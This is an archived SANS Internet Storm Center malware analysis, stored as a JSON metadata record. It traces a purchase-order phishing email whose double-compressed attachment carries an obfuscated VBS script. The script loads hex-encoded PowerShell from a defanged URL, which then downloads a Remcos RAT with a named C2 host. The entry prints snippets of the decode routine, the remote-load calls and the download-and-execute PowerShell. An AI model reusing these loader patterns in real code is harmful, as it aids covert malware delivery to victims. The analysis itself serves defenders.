{
	"id": "3c57ba7e-70f6-41c2-9a7b-fd17d6bff43f",
	"created_at": "2026-04-06T00:21:45.679133Z",
	"updated_at": "2026-04-10T03:21:10.552274Z",
	"deleted_at": null,
	"sha1_hash": "19be13ad7e6361a76bdaf7454f5a866d619974a6",
	"title": "Remcos RAT Delivered Through Double Compressed Archive",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 75051,
	"plain_text": "Remcos RAT Delivered Through Double Compressed Archive\r\nBy SANS Internet Storm Center\r\nArchived: 2026-04-05 19:27:30 UTC\r\nOne of our readers shared an interesting sample received via email. Like him, if you get access to interesting/suspicious data, please share it with us (if you’re authorized of course). We are always looking for fresh meat!\r\nThe file was received as an attachment to a mail that pretended to be related to a purchase order. The file was called “P0-65774383__pdf.tar.lz” (SHA256: ea91dc0fdd99aab9e990b6520c136fc2f0c19b4ba82691ceef853ad4a86c0141). Note the double extension; it can be processed with lunzip on REMnux:\r\nremnux@remnux:/MalwareZoo/20220215$ lunzip -l P0-65774383__pdf.tar.lz\r\n uncompressed compressed saved name\r\n 10240 1362 86.70% P0-65774383__pdf.tar.lz\r\nremnux@remnux:/MalwareZoo/20220215$ file P0-65774383__pdf.tar.lz\r\nP0-65774383__pdf.tar.lz: lzip compressed data, version: 1\r\nThis is a strange way to deliver the payload because files with the extension '.lz' are not supported by default on Windows systems. There is no tool associated with the extension.\r\nLet’s decompress it and untar it:\r\nremnux@remnux:/MalwareZoo/20220215$ lunzip P0-65774383__pdf.tar.lz\r\nremnux@remnux:/MalwareZoo/20220215$ file P0-65774383__pdf.tar\r\nhttps://isc.sans.edu/forums/diary/Remcos+RAT+Delivered+Through+Double+Compressed+Archive/28354/\r\nPage 1 of 3\r\nP0-65774383__pdf.tar: POSIX tar archive (GNU)\r\nremnux@remnux:/MalwareZoo/20220215$ tar xvf P0-65774383__pdf.tar\r\n./\r\n./Protected Client.vbs\r\nThe ‘Protected Client.vbs’ script is nicely obfuscated. Sensitive strings (that could reveal the purpose of the script) are encoded and decoded using the following function:\r\nPrivate Function MpGGKjWFHKaZCsd(sData)\r\n For iChar = 1 To Len(sData) Step 2\r\n pGwFuYQQKTRe = Chr(\"\u0026H\" \u0026 Mid(sData, iChar, 2))\r\n fQMBscV = fQMBscV \u0026 pGwFuYQQKTRe\r\n Next\r\n MpGGKjWFHKaZCsd = fQMBscV\r\nEnd Function\r\nIt’s a simple hex-encoding! Nothing fancy! But the interesting technique is the following, based on GetObject[1]. This function is used to obtain a reference to an object provided by an ActiveX component; usually, it is given a path and file name. But here we have something different (decoded using the function above):\r\nSet YXHivrLSJ = GetObject(\"new:F5078F32-C551-11D3-89B9-0000F81FE221\")\r\nThis UUID corresponds to the ProgID 'MSXML2.XMLHTTP.3.0' as referenced in the Microsoft documentation[2]. Then, the object is populated with malicious content loaded from the following URL:\r\nExecute(\"YXHivrLSJ.Load “hxxp://kastex[.]me/bkp/ybn.jpg'\r\nExecute(\"YXHivrLSJ.transformNode (YXHivrLSJ)\")\r\nThe URL returns the XML content expected by the object. The file contains a PowerShell payload, again hex-encoded:\r\nvar yy=r.ShellExecute(\"powershell.exe\",nm12er7fdffff(\"2467663D2830303130303130302C30313030303130312C3\r\nOnce extracted, it contains:\r\n$uJmg=(01100110,01110101,01101110,01100011,01110100,01101001,01101111,01101110,00100000,01110100,0100\r\n...\r\n,00001010,01111101) | %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };I\r\nDecoded and beautified, we have this code:\r\n$ErrorActionPreference = 'SilentlyContinue';\r\n$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]:\r\n'[void] [System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic')'|IEX;\r\ndo {\r\n $ping = test-connection -comp google.com -count 1 -Quiet\r\n} until ($ping);\r\n$tty='(NewObject Net.WebClient)' | IEX;\r\n$mv= [Microsoft.VisualBasic.Interaction]::CallByname($tty,'DownloadString',[Microsoft.VisualBasic.Cal\r\nThe site has already been cleaned and the payload deleted but, with a bit of hunting on VT, it’s possible to get a copy of the payload. It’s another piece of PowerShell that drops the following malware (SHA256: 8e41caaf8c87e94296783d9907fa170e696175ff46a57584d04df6867b1cfab1). This file is unknown on VT but, after a quick analysis, it's a Remcos[3] RAT sample (C2: notme[.]linkpc[.]net:4376).\r\n[1] https://docs.microsoft.com/en-us/office/vba/language/reference/user-interface-help/getobject-function\r\n[2] https://docs.microsoft.com/en-us/previous-versions/windows/desktop/ms766426(v=vs.85)\r\n[3] https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos\r\nXavier Mertens (@xme)\r\nXameco\r\nSenior ISC Handler - Freelance Cyber Security Consultant\r\nSource: https://isc.sans.edu/forums/diary/Remcos+RAT+Delivered+Through+Double+Compressed+Archive/28354/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://isc.sans.edu/forums/diary/Remcos+RAT+Delivered+Through+Double+Compressed+Archive/28354/"
	],
	"report_names": [
		"28354"
	],
	"threat_actors": [],
	"ts_created_at": 1775434905,
	"ts_updated_at": 1775791270,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/19be13ad7e6361a76bdaf7454f5a866d619974a6.pdf",
		"text": "https://archive.orkl.eu/19be13ad7e6361a76bdaf7454f5a866d619974a6.txt",
		"img": "https://archive.orkl.eu/19be13ad7e6361a76bdaf7454f5a866d619974a6.jpg"
	}
}